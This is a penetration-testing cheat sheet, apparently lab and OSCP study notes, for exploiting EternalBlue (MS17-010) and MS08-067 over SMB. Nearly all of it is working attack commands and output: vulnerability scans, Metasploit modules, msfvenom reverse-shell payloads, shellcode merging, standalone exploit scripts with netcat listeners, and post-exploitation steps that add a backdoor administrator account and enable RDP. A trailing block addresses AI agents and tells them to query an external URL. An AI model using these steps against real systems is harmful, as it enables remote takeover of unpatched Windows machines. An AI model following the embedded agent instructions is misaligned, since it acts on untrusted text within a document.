# Eternal Blue

## REF:

* LegacyHTB, BlueHTB, [SambaSMB](/03-getting-in/03-samba.md), [WindowsCmdKungFu](/07-win-privesc/windows-cmd-kungfu.md)

## nmap

```
---------------------
nmap search and test:

PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds

> grep smb /usr/share/nmap/scripts/
.. smb-vuln-ms08-067.nse

> nmap --script vuln
> nmap --script smb-vuln $IP -Pn -p 445
> nmap --script smb-vuln* $IP -p 139,445
> nmap --script smb-vuln-ms08-067 $IP -Pn -p 445
> nmap --script smb-vuln-ms17-010 $IP -sV -p 445

Host script results:
| smb-vuln-ms08-067: 
| smb-vuln-ms17-010
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     IDs:  CVE:CVE-2017-0143


```

## Eternal Checker

* <https://github.com/3ndG4me/AutoBlue-MS17-010>

```
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue

> python3 eternal_checker.py $IP
[*] Target OS: Windows 5.1
[!] The target is not patched  .. Vulnerable!!!
```

## Eternal Blue - Metasploit

```
> sudo msfconsole
> search ms08-067
> search ms17-010  ..better

set payload windows/x64/meterpreter/reverse_tcp
use ms08_067_netapi
use ms17_010_eternalblue  ..better
set rhost $IP
set lhost $MyIP
show options
exploit

meterpreter > cd C:\Documents and Settings\john\Desktop 
meterpreter > cat user.txt
Flag !!!
```

## AutoBlue - Metasploit

* <https://github.com/3ndG4me/AutoBlue-MS17-010>
* Auto-merge - with Metasploit

```
-----------------------------------
Prep: 
cd shellcode
./shell_prep.sh 

Auto generate a reverse shell with msfvenom? (Y/n) Y
LHOST for reverse connection   : 10.10.14.128
LPORT you want x64 to listen on: 4444
LPORT you want x86 to listen on: 6666
Type 0 for meterpreter shell 1 for regular cmd shell: 1
Type 0 staged payload or 1 for stageless payload    : 0

Generating x64 cmd shell (staged)...
msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=4444
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (staged)...
msfvenom -p windows/shell/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=6666
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

-----------------------------------
Listener:

> ../listener_prep.sh 

LHOST for reverse connection    : 10.10.14.128
LPORT for x64 reverse connection: 4444
LPORT for x86 reverse connection: 6666
Enter 0 for meterpreter shell or 1 for regular cmd shell: 1
Type 0 for staged payload or 1 for a stageless payload  : 0

Metasploit Starts:
Starting listener (staged)...
Starting postgresql (via systemctl): postgresql.service==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
       =[ metasploit v5.0.88-dev                          ]
+ -- --=[ 2014 exploits - 1097 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
[*] Processing config.rc for ERB directives.
resource (config.rc)> use exploit/multi/handler
resource (config.rc)> set PAYLOAD windows/x64/shell/reverse_tcp
resource (config.rc)> set LHOST 10.10.14.128
resource (config.rc)> set LPORT 4444
resource (config.rc)> set ExitOnSession false
resource (config.rc)> set EXITFUNC thread
EXITFUNC => thread
resource (config.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:4444 
resource (config.rc)> set LPORT 6666
resource (config.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:6666 

msf5 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                        Payload opts
  --  ----                    -------                        ------------
  0   Exploit: multi/handler  windows/x64/shell/reverse_tcp  tcp://10.10.14.128:4444
  1   Exploit: multi/handler  windows/shell/reverse_tcp      tcp://10.10.14.128:6666

------------------------------------
Was there another command to run? (I dont remember)

Connected!
```

## Shellprep, AutoMerge, Netcat: Exploit7

* No Metasploit
* <https://outrunsec.com/2020/07/26/cyberseclabs-eternal-walkthrough/>

```
Shell Prep, AutoMerge, listen with Netcat

./shell_prep.sh
Y
ip
4444
5555
reg cmd shell: 1
stageless payload: 1
32/64 generated, merged!!!

nc -lvnp 4444
nc -lvnp 5555  ..2 listeners

python eternalblue_exploit7.py $IP ./AutoBlue-MS17-010/shellcode/sc_all.bin
```

## AutoBlue - No MSF - zzz\_exploit.py

* Needs: mysmb.py
* If you are lucky, this might work without custom payload
* Needs to have pipe known/exposed and guest/anonymous
* Ex: legacyHTB..worked blueHTB..failed

```
> python3 zzz_exploit.py $IP

[*] Target OS: Windows 5.1
[+] Found pipe 'browser'             ..pipe was known
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x820f3240
SESSION: 0xe10855a8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe2148030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe21480d0
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^) 
[!] Executing interactive programs will hang shell!

C:\WINDOWS\system32>whoami  ..system
```

## Exploit7 - No MSF - Manual Merge

* [Blog:Eternalblue\_exploit7.py](https://medium.com/@nimanthad/hack-the-box-blue-writeup-without-metasploit-5e05089a213d)
* <https://github.com/worawit/MS17-010>
* Create 32 and 64bit payloads. Then Merge.
* This Method will skip the "Named Pipes" headache
* Exitfunc means less chance of crash

```
nasm -f bin ./shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
msfvenom -p windows/x64/shell_reverse_tcp lport=443 lhost=$IP --platform windowx -a x64 --format raw -o sc_x64_payload.bin EXITFUNC=thread
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

nasm -f bin ./shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
msfvenom -p windows/shell_reverse_tcp lport=443 lhost=$IP --platform windowx -a x86 --format raw -o sc_x86_payload.bin EXITFUNC=thread
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

python3 ./shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

python3 eternalblue_exploit7.py $IP sc_all.bin
nc -nlvp 443
whoami ..system
```

## AutoBlue - No MSF - zzz\_exploit.py - Named Pipes

* Custom Payload. No Metasploit.
* zzz\_exploit.py
* Needs: mysmb.py
* auxiliary/scanner/smb/pipe\_auditor .. Not allowed on OSCP
* <https://redteamzone.com/EternalBlue/>
* pipes = \[ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ] ..check the code for this!
* more pipes: <https://github.com/3ndG4me/AutoBlue-MS17-010/issues/10>
* Ex: blueHTB

```
Payload
msfvenom -p windows/shell_reverse_tcp lhost $MyIP lport 4444 -f exe > exploit.exe

vi zzz_exploit.py
USERNAME = '//'                           .. Anonymous authentication
PASSWORD = ''                             .. User/Pass if you have one
print('creating file c:\\exploit.exe on the target')
fid2 - smbConn.createFile(tid2, '/exploit.exe')
smb_send_file(smbConn, '/full/path/exploit.exe', 'C', '/exploit.exe')
service_exec(conn, r'cmd /c c:\exploit.exe')

nc -nvlp 4444
python zzz_exploit.py
python zzz_exploit.py <ip> [pipe_name]
python zzz_exploit.py 10.x.x.x            .. pipe Problem

msfconcole                                .. not allowed for OSCP
search pipes                              .. get pipe_name
use 0  
use auxiliary/scanner/smb/pipe_auditor
options
set rhosts 10.x.x.x
run
\samr \ntsvcs \lsass \netlogon \browser   .. found Pipes

python zzz_exploit.py 10.x.x.x samr    
nc -nvlp 4444
C:\WINDOWS\system32>whoami                .. system
```

## RDP Trick

```
C:\WINDOWS\system32>net user
C:\WINDOWS\system32>net user mikes hacks /add
C:\WINDOWS\system32>net localgroup administrators mikes /add

Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mike -p hacks legacy
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/03-getting-in/eternal-blue.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.